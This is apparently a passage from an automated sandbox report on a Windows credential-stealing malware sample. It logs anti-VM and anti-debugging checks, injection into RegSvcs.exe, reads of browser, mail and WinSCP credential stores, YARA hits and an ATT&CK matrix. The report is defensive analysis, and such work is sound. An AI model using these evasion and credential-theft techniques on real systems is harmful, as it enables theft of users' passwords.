                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598433Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598306Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597874Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597756Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597635Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596818Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594583Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594361Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593906Jump to behavior
                Source: RegSvcs.exe, 00000006.00000002.4495084882.0000000003001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: RegSvcs.exe, 00000006.00000002.4498002788.0000000006369000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*#
                Source: RegSvcs.exe, 00000006.00000002.4495084882.0000000003001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: unjuridically.exe, 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: hgfsZrw6
                Source: unjuridically.exe, 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                Source: wscript.exe, 00000004.00000002.2180906390.00000212ABB97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P1
                Source: RegSvcs.exe, 00000003.00000002.2208709668.0000000005C70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeAPI call chain: ExitProcess graph end nodegraph_0-95219
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeAPI call chain: ExitProcess graph end nodegraph_0-94155
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeAPI call chain: ExitProcess graph end node

                Anti Debugging

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00DC7070 CheckRemoteDebuggerPresent,3_2_00DC7070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009D6AAF BlockInput,0_2_009D6AAF
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_00983D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00983D19
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009B3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_009B3920
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_0099E01E LoadLibraryA,GetProcAddress,0_2_0099E01E
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_00CAB368 mov eax, dword ptr fs:[00000030h] | 0_2_00CAB368
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_00CAB308 mov eax, dword ptr fs:[00000030h] | 0_2_00CAB308
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_00CA9CC8 mov eax, dword ptr fs:[00000030h] | 0_2_00CA9CC8
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00CAE848 mov eax, dword ptr fs:[00000030h] | 2_2_00CAE848
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00CAFEE8 mov eax, dword ptr fs:[00000030h] | 2_2_00CAFEE8
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00CAFE88 mov eax, dword ptr fs:[00000030h] | 2_2_00CAFE88
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 5_2_016D6278 mov eax, dword ptr fs:[00000030h] | 5_2_016D6278
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 5_2_016D4BD8 mov eax, dword ptr fs:[00000030h] | 5_2_016D4BD8
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 5_2_016D6218 mov eax, dword ptr fs:[00000030h] | 5_2_016D6218
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_009BA66C
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009A8189 SetUnhandledExceptionFilter,0_2_009A8189
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009A81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009A81AC
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00448189 SetUnhandledExceptionFilter,2_2_00448189
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_004481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004481AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 80B008
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E1C008
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009BB106 LogonUserW,0_2_009BB106
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_00983D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00983D19
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009C411C SendInput,keybd_event,0_2_009C411C
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009C74BB mouse_event,0_2_009C74BB
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RHOqJ5BrHW.exe"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_009BA66C
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009C71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_009C71FA
                Source: RHOqJ5BrHW.exe, unjuridically.exe | Binary or memory string: Shell_TrayWnd
                Source: RHOqJ5BrHW.exe, unjuridically.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009A65C4 cpuid | 0_2_009A65C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009D091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_009D091D
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009FB340 GetUserNameW,0_2_009FB340
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009B1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_009B1E8E
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_0099DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0099DDC0
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: unjuridically.exe, 00000002.00000003.2050370513.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2049933715.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2051632545.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2050434296.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2051985401.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2065899615.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000002.2067133369.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2052308758.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2051078452.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2050962447.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mcupdate.exe

                Stealing of Sensitive Information

                Source: Yara match | File source: dump.pcap, type: PCAP
                Source: Yara match | File source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.unjuridically.exe.1f30000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.unjuridically.exe.3430000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.2202546408.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4495084882.0000000003016000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4495084882.000000000302E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.2202546408.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: unjuridically.exe PID: 6948, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5728, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: unjuridically.exe PID: 4564, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6520, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\FTP Navigator\Ftplist.txt
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: unjuridically.exe | Binary or memory string: WIN_81
                Source: unjuridically.exe | Binary or memory string: WIN_XP
                Source: unjuridically.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: unjuridically.exe | Binary or memory string: WIN_XPe
                Source: unjuridically.exe | Binary or memory string: WIN_VISTA
                Source: unjuridically.exe | Binary or memory string: WIN_7
                Source: unjuridically.exe | Binary or memory string: WIN_8
                Source: Yara match | File source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.unjuridically.exe.1f30000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.unjuridically.exe.3430000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.2202546408.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: unjuridically.exe PID: 6948, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5728, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: unjuridically.exe PID: 4564, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6520, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: dump.pcap, type: PCAP
                Source: Yara match | File source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.unjuridically.exe.1f30000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.unjuridically.exe.3430000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.2202546408.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4495084882.0000000003016000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4495084882.000000000302E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.2202546408.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: unjuridically.exe PID: 6948, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5728, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: unjuridically.exe PID: 4564, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6520, type: MEMORYSTR
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009D8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_009D8C4F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009D923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_009D923B
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00478C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00478C4F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0047923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_0047923B
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information111
                Scripting
                2
                Valid Accounts
                221
                Windows Management Instrumentation
                111
                Scripting
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Ingress Tool Transfer
                1
                Exfiltration Over Alternative Protocol
                1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts3
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol2
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Valid Accounts
                2
                Valid Accounts
                2
                Obfuscated Files or Information
                1
                Credentials in Registry
                2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron2
                Registry Run Keys / Startup Folder
                21
                Access Token Manipulation
